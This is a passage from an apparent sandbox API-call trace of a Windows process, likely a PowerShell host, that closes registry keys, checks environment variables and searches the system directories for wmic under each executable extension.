0xb3c Thread: id = 22 os_tid = 0xb54 Thread: id = 23 os_tid = 0xb4c Thread: id = 24 os_tid = 0xb48 [0085.584] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0090.252] RegCloseKey (hKey=0x340) returned 0x0 [0090.252] LocalFree (hMem=0x25a810) returned 0x0 [0090.252] CloseHandle (hObject=0x32c) returned 1 [0090.253] CloseHandle (hObject=0x13) returned 1 [0090.253] CloseHandle (hObject=0xf) returned 1 [0090.254] RegCloseKey (hKey=0x318) returned 0x0 [0090.254] RegCloseKey (hKey=0x314) returned 0x0 [0090.254] RegCloseKey (hKey=0x310) returned 0x0 [0090.254] LocalFree (hMem=0x25a7e0) returned 0x0 [0091.496] RegCloseKey (hKey=0x310) returned 0x0 [0092.995] RegCloseKey (hKey=0x3a4) returned 0x0 [0092.995] RegCloseKey (hKey=0x3a0) returned 0x0 [0092.995] RegCloseKey (hKey=0x39c) returned 0x0 [0092.995] RegCloseKey (hKey=0x398) returned 0x0 [0092.995] RegCloseKey (hKey=0x394) returned 0x0 [0092.996] RegCloseKey (hKey=0x390) returned 0x0 [0092.996] RegCloseKey (hKey=0x38c) returned 0x0 [0092.996] RegCloseKey (hKey=0x364) returned 0x0 [0092.996] RegCloseKey (hKey=0x3c0) returned 0x0 [0092.997] RegCloseKey (hKey=0x3bc) returned 0x0 [0092.997] RegCloseKey (hKey=0x384) returned 0x0 [0092.997] RegCloseKey (hKey=0x380) returned 0x0 [0092.997] RegCloseKey (hKey=0x37c) returned 0x0 [0092.997] RegCloseKey (hKey=0x378) returned 0x0 [0092.998] RegCloseKey (hKey=0x374) returned 0x0 [0092.998] RegCloseKey (hKey=0x370) returned 0x0 [0092.998] RegCloseKey (hKey=0x36c) returned 0x0 [0092.998] RegCloseKey (hKey=0x368) returned 0x0 [0092.999] RegCloseKey (hKey=0x3b8) returned 0x0 [0092.999] RegCloseKey (hKey=0x358) returned 0x0 [0092.999] RegCloseKey (hKey=0x354) returned 0x0 [0092.999] RegCloseKey (hKey=0x350) returned 0x0 [0093.000] RegCloseKey (hKey=0x34c) returned 0x0 [0093.000] RegCloseKey (hKey=0x348) returned 0x0 [0093.000] RegCloseKey (hKey=0x344) returned 0x0 [0093.000] RegCloseKey (hKey=0x340) returned 0x0 [0093.001] RegCloseKey (hKey=0x32c) returned 0x0 [0093.001] RegCloseKey (hKey=0x3b4) returned 0x0 [0093.001] RegCloseKey (hKey=0x314) returned 0x0 [0093.001] RegCloseKey (hKey=0x310) returned 0x0 [0093.001] RegCloseKey (hKey=0x3b0) returned 0x0 [0093.002] RegCloseKey (hKey=0x3ac) returned 0x0 [0093.002] RegCloseKey (hKey=0x388) returned 0x0 [0093.002] RegCloseKey (hKey=0x3c4) returned 0x0 [0106.989] CloseHandle (hObject=0x13) returned 1 [0106.989] RegCloseKey (hKey=0x354) returned 0x0 [0106.989] CloseHandle (hObject=0x1b) returned 1 [0106.990] CloseHandle (hObject=0x17) returned 1 Thread: id = 25 os_tid = 0xb04 [0093.288] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0093.292] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409 [0093.297] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.297] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.297] CoTaskMemFree (pv=0x2e4780) [0093.299] VirtualQuery (in: lpAddress=0x1c7dde00, lpBuffer=0x1c7decc0, dwLength=0x30 | out: lpBuffer=0x1c7decc0*(BaseAddress=0x1c7dd000, AllocationBase=0x1be50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.302] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.302] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.302] CoTaskMemFree (pv=0x2e4780) [0093.306] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.306] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.306] CoTaskMemFree (pv=0x2e4780) [0093.309] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.309] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.309] CoTaskMemFree (pv=0x2e4780) [0093.337] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.337] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.337] CoTaskMemFree (pv=0x2e4780) [0093.341] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.341] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.341] CoTaskMemFree (pv=0x2e4780) [0093.342] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.342] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.343] CoTaskMemFree (pv=0x2e4780) [0093.348] VirtualQuery (in: lpAddress=0x1c7de0b0, lpBuffer=0x1c7def70, dwLength=0x30 | out: lpBuffer=0x1c7def70*(BaseAddress=0x1c7de000, AllocationBase=0x1be50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.349] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.350] CoTaskMemFree (pv=0x2e4780) [0093.353] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.353] CoTaskMemFree (pv=0x2e4780) [0093.353] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.353] CoTaskMemFree (pv=0x2e4780) [0093.355] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.355] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.355] CoTaskMemFree (pv=0x2e4780) [0093.360] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.360] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.360] CoTaskMemFree (pv=0x2e4780) [0093.501] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.501] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.501] CoTaskMemFree (pv=0x2e4780) [0093.504] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.504] CoTaskMemFree (pv=0x2e4780) [0093.520] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.520] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.520] CoTaskMemFree (pv=0x2e4780) [0093.523] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.523] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.523] CoTaskMemFree (pv=0x2e4780) [0093.525] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.525] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.525] CoTaskMemFree (pv=0x2e4780) [0093.528] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.528] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.528] CoTaskMemFree (pv=0x2e4780) [0093.530] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.530] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.530] CoTaskMemFree (pv=0x2e4780) [0093.553] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.554] CoTaskMemFree (pv=0x2e4780) [0093.641] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.641] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0093.641] CoTaskMemFree (pv=0x2e4780) [0093.646] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.646] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0093.646] CoTaskMemFree (pv=0x2e4780) [0093.652] CoTaskMemAlloc (cb=0x20e) returned 0x2fb970 [0093.652] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2fb970 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0093.652] CoTaskMemFree (pv=0x2fb970) [0093.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0093.659] SetErrorMode (uMode=0x1) returned 0x1 [0093.663] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.ps1", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.664] SetErrorMode (uMode=0x1) returned 0x1 [0093.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0093.664] SetErrorMode (uMode=0x1) returned 0x1 [0093.665] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psm1", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.665] SetErrorMode (uMode=0x1) returned 0x1 [0093.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0093.665] SetErrorMode (uMode=0x1) returned 0x1 [0093.666] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psd1", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.666] SetErrorMode (uMode=0x1) returned 0x1 [0093.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0093.666] SetErrorMode (uMode=0x1) returned 0x1 [0093.666] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.COM", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.667] SetErrorMode (uMode=0x1) returned 0x1 [0093.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0093.667] SetErrorMode (uMode=0x1) returned 0x1 [0093.667] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.EXE", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.668] SetErrorMode (uMode=0x1) returned 0x1 [0093.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0093.668] SetErrorMode (uMode=0x1) returned 0x1 [0093.668] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.BAT", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.669] SetErrorMode (uMode=0x1) returned 0x1 [0093.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0093.669] SetErrorMode (uMode=0x1) returned 0x1 [0093.669] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.CMD", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.669] SetErrorMode (uMode=0x1) returned 0x1 [0093.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0093.670] SetErrorMode (uMode=0x1) returned 0x1 [0093.670] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBS", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.670] SetErrorMode (uMode=0x1) returned 0x1 [0093.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0093.671] SetErrorMode (uMode=0x1) returned 0x1 [0093.671] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBE", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.671] SetErrorMode (uMode=0x1) returned 0x1 [0093.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0093.671] SetErrorMode (uMode=0x1) returned 0x1 [0093.672] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JS", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.672] SetErrorMode (uMode=0x1) returned 0x1 [0093.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0093.672] SetErrorMode (uMode=0x1) returned 0x1 [0093.672] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JSE", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.673] SetErrorMode (uMode=0x1) returned 0x1 [0093.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0093.673] SetErrorMode (uMode=0x1) returned 0x1 [0093.673] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSF", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.673] SetErrorMode (uMode=0x1) returned 0x1 [0093.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0093.674] SetErrorMode (uMode=0x1) returned 0x1 [0093.674] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSH", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.674] SetErrorMode (uMode=0x1) returned 0x1 [0093.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0093.674] SetErrorMode (uMode=0x1) returned 0x1 [0093.674] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.MSC", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.674] SetErrorMode (uMode=0x1) returned 0x1 [0093.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0093.675] SetErrorMode (uMode=0x1) returned 0x1 [0093.675] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.675] SetErrorMode (uMode=0x1) returned 0x1 [0093.675] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0093.675] SetErrorMode (uMode=0x1) returned 0x1 [0093.675] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.ps1", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.676] SetErrorMode (uMode=0x1) returned 0x1 [0093.676] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0093.676] SetErrorMode (uMode=0x1) returned 0x1 [0093.676] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psm1", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.676] SetErrorMode (uMode=0x1) returned 0x1 [0093.676] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0093.677] SetErrorMode (uMode=0x1) returned 0x1 [0093.677] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psd1", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.677] SetErrorMode (uMode=0x1) returned 0x1 [0093.677] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0093.677] SetErrorMode (uMode=0x1) returned 0x1 [0093.677] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.COM", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.678] SetErrorMode (uMode=0x1) returned 0x1 [0093.678] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0093.678] SetErrorMode (uMode=0x1) returned 0x1 [0093.678] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.EXE", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.678] SetErrorMode (uMode=0x1) returned 0x1 [0093.679] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0093.679] SetErrorMode (uMode=0x1) returned 0x1 [0093.679] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.BAT", 